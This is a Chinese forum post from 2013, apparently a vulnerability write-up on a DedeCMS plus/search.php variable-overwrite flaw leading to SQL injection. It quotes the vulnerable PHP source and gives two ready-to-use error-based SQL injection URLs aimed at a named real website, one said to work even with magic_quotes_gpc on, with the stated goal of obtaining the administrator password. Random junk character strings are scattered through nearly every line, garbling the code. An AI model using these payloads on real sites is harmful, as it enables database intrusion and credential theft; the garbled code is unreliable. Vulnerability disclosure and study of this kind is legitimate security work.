微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
" I. F& H% P) D作者: c4rp3nt3r@0x50sec.org7 ~' W5 d& k; p4 X2 s2 w
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
& C: G T! a3 n3 d
" i- W8 q1 \+ S# G% Y黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
! H' I% |& n, }! @4 A 8 D+ { |* R; Y* v) u
============3 _: e. D5 w% {' W/ y! I5 T( m
/ m, `2 \+ L0 f- `
. Y' z7 Q% T! ?/ ~: vDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码., b. M5 \7 t8 }; }% s
" E' S3 m+ x2 A; x
require_once(dirname(__FILE__).”/../include/common.inc.php”);
- t& z7 j- n8 wrequire_once(DEDEINC.”/arc.searchview.class.php”);
# p W5 [$ Z# E$ \: A
4 C6 m" F" `. T# q! ]; h: o# P$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;" N, O% f" ~. f3 a5 K
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;% M) K! Q* K* F
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;& q0 M A/ {: h
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;9 _) A$ E$ {7 {
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
0 Q9 j7 `& m1 w M
2 g. J& O. t& j! v% wif(!isset($orderby)) $orderby=”;
5 e g7 n; G, L1 f) I- M2 t! P8 Celse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
; R' K2 \. Z4 X) H# }5 B
3 j9 p# R+ B) c " e% s# Z# i ^8 m
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
9 C8 g/ t5 x' \$ ^: E! g/ e7 }else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);* u) V# w8 c# h c0 V$ v
- O" n; b6 C/ @1 E
if(!isset($keyword)){
" {8 h0 p' G. U if(!isset($q)) $q = ”;2 y0 i& A( V8 O( }8 R
$keyword=$q;
3 p+ b; j, y) I2 b}0 W; u d0 A2 }7 b. n3 d! S1 @
$ B* W2 d5 a+ J' U
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));" z. ~! O/ S8 h/ @* |6 [; [8 {
! ?' n( L& y0 b9 x' p: x( r//查找栏目信息
v$ ?3 q* ^( Z- y5 _if(empty($typeid))& F' x" @3 g% ?5 p* V. d. `( k. W
{
; J0 X/ z- z6 {" {* ? $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
2 t* c0 l& R1 o9 q- m- `) r4 E if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
2 d# w/ ?2 T: Z( @( u; b( L- h {
4 s+ e ]& s+ Z0 R1 p $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);1 m; k' T1 }9 f2 ]7 ~8 n
fwrite($fp, “<”.”?php\r\n”);2 ~ L' @0 z7 M5 u% s* F" ~
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
& P8 l0 [, {) ~6 [0 o $dsql->Execute();
4 o# t! {/ _# Q; V5 v9 _5 t8 s* t while($row = $dsql->GetArray())
6 g% Y* T/ ]7 W! y {
! G# ]" s [/ V# f* s5 v8 J0 e6 [ fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
( w- N z) l Q$ _8 V* h }" {5 l; y( I2 a9 s
fwrite($fp, ‘?’.'>’);
4 Z% P% P- n; E7 j- r: @ fclose($fp);; Y& q1 B' P8 E, Z, `! L% p
}
- g" ^6 m L3 ?- R$ P //引入栏目缓存并看关键字是否有相关栏目内容3 M1 `( G0 `6 q& y
require_once($typenameCacheFile);
5 X; C& a9 w ^//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个8 e: h |1 T0 v7 s. K
/// K4 F4 ` v/ z- p8 ]/ b
if(isset($typeArr) && is_array($typeArr))
8 H; j0 a8 |' a$ A- ~+ V7 f0 u- Q {
i& l8 g y9 |4 M$ t9 q6 X foreach($typeArr as $id=>$typename)" J; n" y7 K8 ~7 N
{
* p, M& w3 R; x/ s. o
% o( J; j+ H# Y0 G" F <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
+ O6 S6 v# A+ w- t# B( t0 V5 ?3 {3 Q* @ if($keyword != $keywordn)5 ]% ?. T) {1 U; b* C) `% _
{9 @5 \0 C, d/ V. Z. Y' H
$keyword = $keywordn;
; A1 A# G1 y; m) h5 ?/ E: R$ E3 h <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
% T, ?5 v+ I5 M, i; }" ` break;5 A& _1 I5 S3 V4 w* G
}+ r9 w. o$ }4 P4 ?
}% Q8 G; F4 u+ Q/ R9 F3 V$ T
}
2 n+ X$ s3 }/ G}
8 s" M8 T& L6 v% p2 }$ |7 j' S然后plus/search.php文件下面定义了一个 Search类的对象 .
3 b. u, ^* M$ h5 x! Y在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.7 N! P! N" R& ^* A W* f+ {
$this->TypeLink = new TypeLink($typeid);8 j9 B z8 b2 X9 M) V/ g& ^! d
/ o. Z h+ d S! o" i
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
( O C( o) U0 q; i
\" t6 i8 m9 e) |# v9 _# x0 d7 Xclass TypeLink. m1 A8 U3 I' B
{6 f; f; S4 V. @$ E" ^1 I) o* _
var $typeDir;
) c. T) h4 D/ Z" w. p& e2 | a1 ]$ H var $dsql;
2 E7 n$ l" \7 m5 n; g var $TypeID;
$ T) U# P0 Q1 {8 J var $baseDir;
9 d( z0 {: P, Y! t var $modDir;( d1 p! V9 `$ @! R( P9 U
var $indexUrl;. `3 }0 }. X3 \- i* l. B
var $indexName;
0 C7 e7 T, r5 d ~3 ~ var $TypeInfos;
; N$ `: h% {/ a; Y var $SplitSymbol;
! t/ D; ?7 s* ] var $valuePosition;
9 w5 r3 J! |" n _; k var $valuePositionName;1 U# \2 P' h+ X8 P3 s6 t: U0 H
var $OptionArrayList;//构造函数///////( P3 d; U* B7 @1 F+ g. x R
//php5构造函数 v0 j( R& V6 w `7 ~! \' ]1 O5 K* o
function __construct($typeid): c% B; q/ l& L5 l9 Z K# k1 J
{- |% J7 n$ x- j8 Q! y# h/ b
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];' @- z6 a+ F. j* J. v- L; d/ p
$this->indexName = $GLOBALS['cfg_indexname'];% [. ~2 j+ T d
$this->baseDir = $GLOBALS['cfg_basedir'];
1 d- ^ T" I- V5 } $this->modDir = $GLOBALS['cfg_templets_dir'];* \* P( ?! _* C# K0 T. p
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];3 N' f0 S, E; v. u: c
$this->dsql = $GLOBALS['dsql'];
6 F4 X k1 V1 D% W4 m x( M $this->TypeID = $typeid;# V3 {3 O) h9 L; U/ b: G' q
$this->valuePosition = ”;
% `& m% b- D, a0 O0 {2 l $this->valuePositionName = ”;) T0 x8 s9 B% ~6 t; ?5 o
$this->typeDir = ”;
! G7 N4 I" T3 r) _ $this->OptionArrayList = ”;. M' n4 e: h `' T- c& G X* S/ }
" n" L5 @ W/ f8 I" \ //载入类目信息" T+ Z- s) B ]+ y: N6 z2 t
+ e8 c3 D3 B$ D <font color=”Red”>$query = “SELECT tp.*,ch.typename as ~1 D2 R2 B. f- n; h# n: d; u0 Y
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join2 ^. j; [, V4 n$ k
`#@__channeltype` ch4 u7 t* b; @- ~
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿5 a X+ |+ @2 f) a, a
6 `- E& c Q L {* ~% J6 i' I0 A; W
if($typeid > 0)
( t3 X, [1 S4 {5 g, [1 k @/ m* } {
& p& F6 l) U4 K X* ^ $this->TypeInfos = $this->dsql->GetOne($query);
' h4 }' Y1 ?+ F) P5 Q% x利用代码一 需要 即使magic_quotes_gpc = Off
& t6 V8 ] o7 m: H- B3 E # w/ d: w! M& r) L9 P% n
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title5 I8 M" H3 b% o- b
# \5 Z, w6 q$ j% l这只是其中一个利用代码… Search 类的构造函数再往下
- W* z, H& N' |2 }8 d. x 1 U5 S; ?; E* \5 e8 {* K' z1 e
……省略
3 S3 a" z% G( w: h/ ]. F$this->TypeID = $typeid;2 }1 S2 i" A% h2 w0 B6 g9 o1 ]$ p
……省略+ c E5 r" Q- S! _
if($this->TypeID==”0″){1 A+ `4 p6 o: ~/ C V2 a" D+ K
$this->ChannelTypeid=1; h& F) ]4 p7 p4 O0 P& H/ [
}else{* c9 c9 C$ V; v0 v9 a% Z$ x3 P# T( H
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
& S/ {8 d7 ]7 p//现在不鸡肋了吧亲…8 K: G4 q3 d5 E/ W7 q" E
$this->ChannelTypeid=$row['channeltype'];
$ E8 M/ J8 r3 u, X , F& D, u; P- ~5 k5 `. Z3 ~& j/ G; N
}! g( v1 F2 H3 N% m$ A3 s3 Q1 r& T0 e/ d
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用." x" M, r8 R" U) e' ~1 E
& g% Y( P4 Q4 W- q0 I E
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
) s5 ~! f: G0 G ]
% Y# u6 K4 }+ Q$ ?- D* ^% F2 p如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站, z0 K" t D e/ a
|
发表于 2013-1-19 08:18:56
收藏
支持
反对